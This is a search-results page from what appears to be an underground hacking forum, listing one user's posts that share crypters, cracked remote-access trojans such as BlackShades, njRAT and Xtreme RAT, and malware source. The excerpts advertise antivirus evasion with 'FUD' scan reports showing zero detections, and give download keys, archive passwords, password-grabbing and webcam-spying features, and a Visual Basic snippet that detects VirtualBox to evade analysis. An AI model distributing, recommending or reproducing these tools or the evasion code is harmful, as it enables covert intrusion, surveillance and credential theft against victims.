Search results

  1. Murdret

    V B Source Codes by T-N-T

    Visual Basic 304 Crypter Binder Rat Keylogger [ASF]Schwarze Sonne carb0n crypter 1.6 carb0n crypter 1.7 [fix] Chirstmas Crypter Source Fly Crypter v2d + Automatically Uniq Stub Generator 0.3 Hackhound Crypter V.4 _FIXED_SCR_ m3m0´s Crypter 2.0 ScanTime Crypter ScantimeCrypter Simple Crypter...
  2. Murdret

    [SRC] BlackShades 2.6.3
  3. Murdret

    AntiVirualBox [Modulo][Source]

    Function NOVBX() Set Fso = CreateObject("Scripting.FileSystemObject") If (Fso.FileExists(Environ("programfiles") & "\Oracle\VirtualBox\VBoxSvc.exe")) Then End End If End Function
  4. Murdret

    Ofuscator v BETA by Expermicid Coder: Expermicid
  5. Murdret

    [C++] [HELP] AES encryption between C/C++ and PHP

    #include <stdio.h> #include <openssl/aes.h> #include <openssl/rand.h> #include <Windows.h> #define MAX_BUFFER_SIZE 10240 int main(){ char TEXT_TO_ENCODE[] = "This is a simple text :)"; //AES_BLOCK_SIZE = 16 AES_KEY key; char ENCODED_TEXT[MAX_BUFFER_SIZE]; char KEY_STR[] =...
  6. Murdret

    RazorCrypt2 [1.0.7] - Cracked Hum

    Version: Pass: Enc: AES128/6969 > RABBIT/6969 Código: U2FsdGVkX18mwo/HDV1dzD7HXQbighjQX7hWmMHTSv3fE4VI6/p3heImTB9MnaJmEBfXUK1/L2FefPta0Cwnh7gENaYgK0JNGA8VSInxc4s= File Info: File Name: 107_test.exe SHA1...
  7. Murdret

    Aegis Crypter 3.1 semi FUD

    Check type: File Subject: xtrem.exe Size (bytes): 134463 Started at: 17:38 09.08.2013 Finished at: 17:39 09.08.2013 Duration: 00:00:34 MD5: 9a9d2865fdb0e29ee8c79fb8f8d3606a SHA1: 9aaf5737e425acd7e44a5c01b20d812cb9ac745e arcavir-Ok avast-Ok avg-Ok avira-Ok bitdefender-Ok clamav-Ok drweb-Ok...
  8. Murdret

    Metal Girl Crypter [V2]

    download:!dJRlURRY!Zj4c5UDKuKvWuO7PcbFvhWLSXvwj_3tZrC2KqxQexFY Pass:PUTO QUICK HEAL
  9. Murdret

    Crypter Yes We Can

    url][/url] FileName = BOLITAA.exe FileSize = 86,020 Kbs Scan : Detections = 3 Of 23 arcavir : OK avast : OK avg : OK avira : Is the TR/Crypt.XDR.Gen Trojan bitdefender : OK clamav : OK drweb : infected with Trojan.VbCrypt.250...
  10. Murdret

    Crypter Insecto Pass:-.-- --- -. ..
  11. Murdret

    Poseidon simple crypter pass:
  12. Murdret

    Fuck Avs Crypt3r V1 100% FUD

    Tipo de Reporte: File Nombre: Stub.exe Tamaño (bytes): 552960 Fecha: 09.08.2013, 04:22 MD5: 28fc60e85a22714221e7dc86a4e89423 SHA1: a7c8e6e7f9adf7203224e132097269a96934a694 URL: Detecciones: 0/23 ArcaVir - Limpio! Avast - Limpio! AVG -...
  13. Murdret

    Waska Crypter 100%

    Scan Stub: File Info Report Date: 09.08.2013 08:08:51 Link To Scan: File Name:Waska.exe File Size: 114688 bytes MD5 Hash: b89749a5c87969b304843e05775e8a0a SHA1 Hash: 00f4a823d61504fea4db3d4ed2f705428b2c7ffa Status: Clean Total Results: 0/35...
  14. Murdret

    SpyNet 3.1 Cracked By Evileye
  15. Murdret

    Blackshades v5.3 Cracked! By The Old Warrior

    [align=center][video=youtube] -Instructions- 1. Extract 2. Double Click " Injector.exe" 3. Type any username 4. Type any number 5. Enjoy!
  16. Murdret

    njrat v0.5.0

  17. Murdret

    Lost®Door V8.0.1 Fix

    [+] Lost Door Tested in & Support all of Windows OS [Win xp, Win Vista, Win 7, Win 8, Starter, x32 Bits& x64Bits] [+] Save & Load Builder Settings[17-10-2012] [+] Generate Folder & ActiveX Name [18-10-2012] [+] Clear The Temp Folder (image Preview)[18-10-2012] [+] Classify The Downloaded...
  18. Murdret

    Xtreme Rat 3.6 Private! Cracked

    - Corrected a bug that close Webcam window when use Desktop Capture or Audio Capture - Download plugin function from webserver was added - Corrected select icon function in create servers - Faster Desktop Capture function - Added new method to grab firefox passwords (last version 13.0) -...
  19. Murdret

    CyberGate Cracked by The Old Warrior

    [align=center][video=youtube] Pass:
  20. Murdret

    M3 AutoIt Rat v1.2.1 Update [ Beta ]

    [align=center] ACTUALIZAR LOS ARCHIVOS # Bug's Fixed's - External IP - Process List - Path List - Joiner - Spread USB - Optimized Connection # Add functions - Services List - Programs Installed's - 3 DNS Listening - Server Pluguin ( Hide Process by Hook ) Scan Actualizado : [Info]...
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